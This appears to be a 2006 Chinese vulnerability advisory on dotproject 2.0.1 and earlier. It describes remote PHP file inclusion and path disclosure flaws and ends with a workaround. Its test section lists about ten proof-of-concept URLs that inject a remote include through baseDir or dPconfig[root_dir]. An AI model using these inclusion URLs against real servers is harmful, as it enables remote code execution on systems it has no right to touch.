发布日期：2006-02-14
更新日期：2006-02-14

受影响系统：

dotproject dotproject <= 2.0.1

描述：

---

BUGTRAQ  ID: 16648

dotproject是一个PHP+MySql编写的beta级基于web的项目管理和跟踪工具。

dotproject实现上存在多个输入验证漏洞，远程攻击者可能利用这些漏洞在系统上执行任意命令。

dotproject的protection.php脚本没有正确地验证siteurl参数中的用户输入，因此攻击者可以通过eval()包含远程PHP文件并执行任意PHP代码。

此外，还有一些路径泄露漏洞。如果使用baseDir=foobar参数直接访问的话，几乎所有/db/中的文件都可能出现一些可利用的php错误。如果没有删除/doc/目录的话（默认配置），就可以访问以下两个文件泄漏系统信息：

1) /docs/phpinfo.php - phpinfo()文件
2) /docs/check.php - 有关所安装的dotProject的信息

<*来源：Robin Verton （r.verton@gmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113994247729915&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/includes/db_adodb.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/includes/db_connect.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/includes/session.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]

http://www.example.com/modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]

http://www.example.com/modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]

http://www.example.com/modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/modules/public/calendar.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/modules/public/date_format.php?baseDir=[REMOTE INCLUDE]

http://www.example.com/modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

建议：

---

临时解决方法：

* 禁止register_globals，删除/docs/目录并用htaccess对/db/目录设置访问控制。

厂商补丁：

dotproject
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dotproject.net/

浏览次数：3432
严重程度：0（网友投票）